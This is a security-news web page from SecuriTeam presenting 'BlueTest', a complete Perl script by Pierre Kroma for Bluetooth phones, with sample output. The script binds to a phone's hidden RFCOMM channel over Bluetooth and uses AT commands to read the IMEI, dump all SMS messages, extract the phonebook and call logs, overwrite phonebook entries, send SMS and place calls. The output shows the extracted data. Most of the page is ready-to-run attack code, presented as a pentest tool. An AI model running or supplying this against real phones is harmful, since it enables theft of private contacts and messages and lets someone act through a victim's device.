Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	BlueTest - Bluetooth Scanner 18 Jul. 2005     Credit: The information has been provided by Kroma Pierre. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Kroma Pierre wrote a tool that can scan Bluetooth devices: What can it do? 1. Search devices 2. Ping a device (optional) 3. Bind a device (ex. 6310i) 4. Extract device information 5. Extract/manipulate phonebook entries 6. Extract/manipulate SMS entries (Only Nokia 6310i is supported) 7. Extract dialed numbers, missed calls, received calls 8. Make a call (hangup after 20 sec.) What do you need to run it? 1. Mobile device/phone (example: 6310i) 2. Perl + Device::Gsm;Getopt::Std;Term::ReadLine;Device::Modem;Term::ANSIColor 3. Bluetooth adapter (example: linksyss usbbt100) 4. Start the script as root (you need root to bind a device at /dev/rfcomm0) Tool: #!/usr/bin/perl # # bluetooth hacking tool # # written by pierre kroma # kroma@syss.de use Device::Gsm; use Getopt::Std; use Term::ReadLine; use Device::Modem; use Term::ANSIColor; ############## U S A G E ################## getopts("bcpsv", \%args); system ("clear"); print "\nBluetooth Pentester\n"; print "written by pierre kroma (kroma\@syss.de)\n\n"; if (!defined $args{s}) { print qq~ Usage: perl bluetest.pl -s { -b <bt-addr> -c channel -p -v }         -b <bt-addr> = hardware address of the target bluetooth device (example: 00:11:22:33:44:55)         -c <channel> = channel  -p = ping the remote device  -s = start the script         -v = be verbose ~; exit;} ################# D E F I N I T I O N ########## # tools my $hcitool="/usr/bin/hcitool"; my $l2ping ="/usr/bin/l2ping"; my $rfcomm ="/usr/bin/rfcomm"; my $lsusb = "/usr/sbin/lsusb"; my $hciconfig = "/usr/sbin/hciconfig"; my $bluefw = "/sbin/bluefw"; # variable my $bluedev="hci0"; my $bt_addr = 0; my $channel = $args{c}; my $i = 0; ########## S U B R O U T I N E S ################# sub init_adapter {  use strict;  my $busnum = "";  my $devnum = "";  # busid 0a12:0001 = linksys USBBT100 usb bluetooth stick  my $id = `$lsusb 2>/dev/null |grep 0a12:0001`;  # more generic  # my $id = `$lsusb 2>/dev/null |grep -i bluetooth`;  if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ )  {   $busnum = $1;   $devnum = $2;   system("$bluefw usb $busnum\/$devnum");   system("$hciconfig $bluedev up");   sleep(1.5);  } } sub init_modem {  $modem = new Device::Modem( port => '/dev/rfcomm0' );  if( $modem->connect( baudrate => 9600 ) ) {         # print "connected!\n";    } else {         print "sorry, cannot connect to your serial port!\n";    }  # turn off the local echo  $modem->echo(0); } sub searching {  print color 'bold blue';  print "search devices\n";  print color 'reset';  my @scan = `$hcitool scan | grep -v "Scanning"`;  foreach $line (@scan)  {   print $i++;   print $line;  }  print "\n"; } sub selecting {  # select a device  if($args{'b'})  {   $bt_addr = $args{b};  }  else  {   $term = new Term::ReadLine 'bluetooth address reader';   my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";   my $OUT = $term->OUT || \*STDOUT;   $bt_addr = $term->readline($prompt);  } } sub ping {  # ping the remote device  if($args{'p'})  {      # ping the remote device      print color 'bold blue';      print "\nping the remote device $bt_addr\n";      print color 'reset';      die "You must be root to use l2ping!\n" if $> != 0;      system ("$l2ping -c 5 $bt_addr");  } } sub binding {  # binding a device  print color 'bold blue';  print "\n\nbind a device to $bt_addr \t\t";  print color 'reset';  if($args{'c'})  {   $channel = $args{c};  }  else  {   # setting default nokia 6310i hidden channel 17 or 18   $channel = 17;  }  system("$rfcomm release $bluedev 2>/dev/null");  sleep(2);  system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null");  sleep(2);  # Connect to the mobile phone  # for devfs  # my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );  # for udev  $gsm = new Device::Gsm( port => '/dev/rfcomm0' );    if( $gsm->connect() )  {   print color 'bold green';         print "connected!\n";   print color 'reset';    }  else  {   print color 'bold red';         print "sorry, no connection with gsm phone on serial port!\n";   print color 'reset';   exit (1);    }  # Register to GSM network  $gsm->register(); } sub manu {  # Extract the manufacturer  my $man_name = $gsm->manufacturer();  print "manufacture: $man_name \n"; } sub model {  # model  my $model = $gsm->model();  print "model: $model \n"; } sub sw {  # software revision  $modem->atsend( 'AT+CGMR' . Device::Modem::CR );    $rev = $modem->answer();  $rev =~ s/\r//g;  $rev =~ s/OK//g;  print "software revision: \n \n $rev";  sleep(1); } sub imei {  # Extract the IMEI number  my $imei = $gsm->imei();  $imei =~ s/\r//g;  $imei =~ s/OK//g;  print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n"; } sub readbook {  print color 'bold blue';  print "\n\nextract the phonebook\n\n";  print color 'reset';  if($args{'v'})  {  print "storagelocation:";  print qq~ ME => storage: device SM => storage: SIM-card MT => combination of ME + SM (doesn t work FOR MY 6310i) BM => storage: CB-news  ~;  }     print "\nsupported storage location";  $modem->atsend( 'AT+CPMS=?' . Device::Modem::CR );    $types = $modem->answer();  $types =~ s/\r//g;         $types =~ s/\n//g;  $types =~ s/OK//g;  $types =~ s/\+CPMS//g;  print "$types \n";    print "\ncurrent phonebooksource";  $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );    $source = $modem->answer();  $source =~ s/\r//g;         $source =~ s/\n//g;  $source =~ s/OK//g;  $source =~ s/\+CPBS//g;  print $source;  print "\n\n";  print "\ncurrent used storage on device";  $command="AT+CPBS=\"ME\"";  $modem->atsend( $command . Device::Modem::CR );  $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );    $memory = $modem->answer();  $memory =~ s/\r//g;         $memory =~ s/\n//g;  $memory =~ s/OK//g;  $memory =~ s/\+CPBS//g;  print $memory;  print "\ncurrent used storage on SIM";  $command="AT+CPBS=\"SM\"";  $modem->atsend( $command . Device::Modem::CR );  $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );    $source = $modem->answer();  $source =~ s/\r//g;         $source =~ s/\n//g;  $source =~ s/OK//g;  $source =~ s/\+CPBS//g;  print $source;  print "\n\n";  my $prompt = "What do you want to readout? (ME oder SM) : ";  my $OUT = $term->OUT || \*STDOUT;  $type = $term->readline($prompt);  $command = "AT+CPBS=\"$type\"";  $modem->atsend( $command . Device::Modem::CR );    $asource = $modem->answer();  $asource =~ s/\r//g;         $asource =~ s/\n//g;  $asource =~ s/OK//g;  print $asource;  my $prompt = "starting from entry (>=0): \t ";  my $OUT = $term->OUT || \*STDOUT;  $start = $term->readline($prompt);  print "\n";  my $prompt = "ending to entry:\t\t";  my $OUT = $term->OUT || \*STDOUT;  $max = $term->readline($prompt);  print "\n";  if ( $start > $max || $start <= '0' )  {   print "oops damn f*cking long night? \n";   print "initial value <= 0? \n";   print "or initial value > final value? \n";   exit (1);  }  list_entries ();  print "\nextract last 5 dialled numbers: \n";  $command = "AT+CPBS=\"DC\"";  $modem->atsend( $command . Device::Modem::CR );    $asource = $modem->answer();  $asource =~ s/\r//g;         $asource =~ s/\n//g;  $asource =~ s/OK//g;  print $asource;  $start=1;  $max=5;  list_entries ();  print "\nlast 5 missed calls: \n";  $command = "AT+CPBS=\"MC\"";  $modem->atsend( $command . Device::Modem::CR );    $asource = $modem->answer();  $asource =~ s/\r//g;         $asource =~ s/\n//g;  $asource =~ s/OK//g;  print $asource;  $start=1;  $max=5;  list_entries ();  print "\nlast 5 received calls: \n";  $command = "AT+CPBS=\"RC\"";  $modem->atsend( $command . Device::Modem::CR );    $asource = $modem->answer();  $asource =~ s/\r//g;         $asource =~ s/\n//g;  $asource =~ s/OK//g;  print $asource;  $start=1;  $max=5;  list_entries (); } sub list_entries {  $i = $start;  foreach $i ( $start..$max )  {   $command = "AT+CPBR=$i";   $modem->atsend( $command . Device::Modem::CR );   $entry = $modem->answer();   # format   $entry =~ s/\r//g;          $entry =~ s/\n//g;   $entry =~ s/OK//g;   # parse   # type = 145 = international format = number starts with +   # type = 129 = unknown number format = didn't start with +          ( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR: ($i),"(.+?)",(\d+),"(.+)?"\r?$/m;   $type =~ s/145/international/g;   $type =~ s/129/unknown/g;     if ( $num == '' )   {    print "entry $i: is empty \n";   }   else   {    print "entry $i: $num, $type, $tag \n";       }  } } sub sendsms {  # Send a text message quickly  print color 'bold blue';  print "\n\nwrite a message (SMS)\n";  print color 'reset';  print "\n";  my $prompt = "recipient (example +4912345678): ";  my $OUT = $term->OUT || \*STDOUT;  $recipient = $term->readline($prompt);  print "\n";  my $prompt = "message: ";  my $OUT = $term->OUT || \*STDOUT;  $message = $term->readline($prompt);  my $status = $gsm->send_sms(           recipient => $recipient,           content => $message     );  if ( $status )  {   print color 'bold green';   print "\nmessage transmitted successfully.\n";   print color 'reset';  }  else  {   print color 'bold red';   print "\nERROR: message couldn`t delivered.\n" ;   print color 'reset';  }  sleep(2); } sub readsms {  # Get list of device::Gsm::Sms message objects  # see `examples/read_messages.pl' for all details    # get mode status  $modem->atsend( 'AT+CMGF?' . Device::Modem::CR );  print color 'bold blue';  print "\nSMS Menu";  print color 'reset';  print "\n \ncurrent sms status (0=PDU, 1=text)";    my $status = $modem->answer();  $status =~ s/\r//g;         $status =~ s/\n//g;  $status =~ s/OK//g;  $status =~ s/\+CMGF//g;  print $status;  sleep(2);    # switch to text mode (does not work with 6310i)  # print "switch to text mode \n";  # $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR );    # print $modem->answer();  print "\n\nextract all sms \n";  $modem->atsend( 'AT+CMGL=4' . Device::Modem::CR );    my $extract = $modem->answer();  $extract =~ s/OK//g;  $extract =~ s/\+CMGL://g;  sleep(2);  print $extract;   } sub call {  # read number  print color 'bold blue';  print "\n\nmaking a call\n";  print color 'reset';  print "\n";  my $prompt = "Which number should be called? (example: 004970714078560): ";  my $OUT = $term->OUT || \*STDOUT;  $number = $term->readline($prompt);  print "\ncalling $number \n";  my $max = 20;  if (fork)  {   $modem->dial( $number );  }  else  {   print "waiting $max seconds before ring off: ";   $i = 0;   foreach $i ( 1..$max )   {    print "$i ";    sleep(1);   }   print "\n";   $modem->hangup();  } } sub writebook {  print color 'bold blue';  print "\ncreate a phonebook entry";  print color 'reset';  print "\n";  my $prompt = "storage space number (ATTENTION: you may overwrite an existing entry:): ";  my $OUT = $term->OUT || \*STDOUT;  $nr = $term->readline($prompt);  print "\n";  my $prompt = "phone-number (format +49123456789): ";  my $OUT = $term->OUT || \*STDOUT;  $tel = $term->readline($prompt);  print "\n";  my $prompt = "name: ";  my $OUT = $term->OUT || \*STDOUT;  $name = $term->readline($prompt);  print "\n";  my $prompt = "storage location (ME=device, SM=SIM): ";  my $OUT = $term->OUT || \*STDOUT;  $place = $term->readline($prompt);  $command="AT+CPBS=\"$place\"";  $modem->atsend( $command . Device::Modem::CR );  $command="AT+CPBW=$nr,\"$tel\",145,\"$name\"";  $modem->atsend( $command . Device::Modem::CR );    $source = $modem->answer();  $source =~ s/\r//g;         $source =~ s/\n//g;  $source =~ s/OK//g;  print $source;  print "\n\nchecking......";  $start = $nr - 5;  $max = 5;  if ( $start <= 0 )  {   $start = $nr;  }  $max = $nr + 5;  print "\n extract your phonebook from storage space number $start to $max \n";  list_entries ();  print "\n"; } sub key {  my $message = "- press any key -";  my $OUT = $term->OUT || \*STDOUT;  $term->readline($message); } sub final {  #system ('cat ./logo.txt');  print color 'bold red';  print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";  print color 'reset';  $modem->disconnect();  print "\n"; }   ############### M A I N ################ init_adapter (); searching (); selecting (); ping (); binding (); init_modem (); print color 'bold blue'; print "\nextract device information\n"; print color 'reset'; manu (); model (); sw (); imei (); key(); readsms (); sendsms (); key (); readbook (); writebook (); key (); call (); key (); final (); Example results: ### # test: # ### Bluetooth Pentester written by pierre kroma (kroma@syss.de) search devices 0 00:60:57:XX:XX:XX Exploit Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX bind a device to 00:60:57:XX:XX:XX connected! extract device information manufacture: Nokia model: Nokia 6310i software revision:    V 5.51 08-07-03 NPL-1 (c) NMP. IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX - press any key - SMS Menu   current sms status (0=PDU, 1=text): 0 extract all sms  1,1,,159 0791971 ----------- c u t ---------------- ( ;-) ) write a message (SMS) recipient (example +4912345678): +491727777777 message: SMILE message transmitted successfully. extract the phonebook supported storage location: ("ME","SM"),("ME","SM"),("MT") current phonebooksource: "SM",16,100 current used storage on device: "ME",9,500 current used storage on SIM: "SM",16,100 What do you want to readout? (ME oder SM) : SM starting from entry (>=0): 18 ending to entry: 30 entry 18: is empty entry 19: is empty entry 20: +49110, international, SySS-Hotline entry 21: +4917222442, international, D2-Blumengruss entry 22: +4917222334, international, D2-Events entry 23: +4911880, international, Telefonauskunft entry 24: +4917222333, international, D2-Hotelservice entry 25: 22444, unknown, D2-Wetterinfo entry 26: 222222, unknown, D2-ADAC Pannenhilf entry 27: +4917222330, international, D2-Reiseservice entry 28: 22666, unknown, D2-PassoVoice entry 29: 22922, unknown, D2-Konto-Server entry 30: 22933, unknown, D2-HandyBrse extract last 5 dialled numbers: entry 1: 012334566, unknown, entry 2: 0123454566, unknown, entry 3: 09345739857, unknown, entry 4: 09287429184, unknown, entry 5: +49123456789, international, last 5 missed calls: entry 1: +49110, international, entry 2: +4919222, international, entry 3: +49112, international, entry 4: is empty entry 5: is empty last 5 received calls: entry 1: is empty entry 2: +4970714078560, international, entry 3: +4900001111111, international, entry 4: +4911111111111, international, entry 5: +49123456789, international, create a phonebook entry storage space number (ATTENTION: you may overwrite an existing entry:): 19 phone-number (format +49123456789): +49666666 name: Callgirl storage location (ME=device, SM=SIM): SM checking......  extract your phonebook from storage space number 14 to 24 entry 14: is empty entry 15: is empty entry 16: is empty entry 17: is empty entry 18: is empty entry 19: +49666666, international, Callgirl entry 20: +49110, international, SySS-Hotline entry 21: +4917222442, international, D2-Blumengruss entry 22: +4917222334, international, D2-Events entry 23: +4911880, international, Telefonauskunft entry 24: +4917222333, international, D2-Hotelservice making a call Which number should be called? (example: 004970714078560): 004970714078560 calling 004970714078560 waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Apache mod_rewrite Vulnerability PoC netsniff-ng - A Linux Network Analyzer and Networking Toolkit Simple Local File Inclusion Exploiter NiX A Linux Brute Forcer Nchop - A TCP Session Splicing Tool Used to Rvade Intrusion Detection Systems Netifera - Modular Open Source Platform for Security Tools WarVOX - Tools for Exploring, Classifying, and Auditing Telephone Systems Webshag - Web Server Audit Tool Browser Fuzzer FSpy - Linux Filesystem Activity Monitoring telnetrecon - Telnet Recon Zerowine Sandbox JPEG Fuzzer VNC Server Fuzzer RSH Fuzzer  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®